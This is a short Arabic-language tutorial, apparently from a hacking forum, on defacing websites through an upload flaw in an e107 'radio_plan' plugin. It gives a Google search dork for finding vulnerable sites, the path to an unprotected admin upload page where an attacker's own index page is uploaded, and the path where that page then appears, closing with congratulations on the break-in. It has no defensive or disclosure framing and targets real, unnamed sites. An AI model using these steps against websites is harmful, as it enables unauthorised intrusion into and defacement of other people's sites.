ثغرة upload

بسم الله الرحمان الرحيم

نبدأ :

نفتح google .

و نضع الدورك :

inurl:/e107_plugins/radio_plan  

تضهر لنا المواقع التي تحتوي عليه ..

ندخل لاحد المواقع مثال www.----.com

- الاستغلال :

http://www.----.com//e107_plugins/radio_plan/admin/upload.php  

نرفع الاندكس هنا .

- عندما يتم ذلك نذهب مسار الاندكس حقك عند الرفع .

http://www.----.com//e107_plugins/radio_plan/images/nomindex.html  

و مبروك عليك الاختراق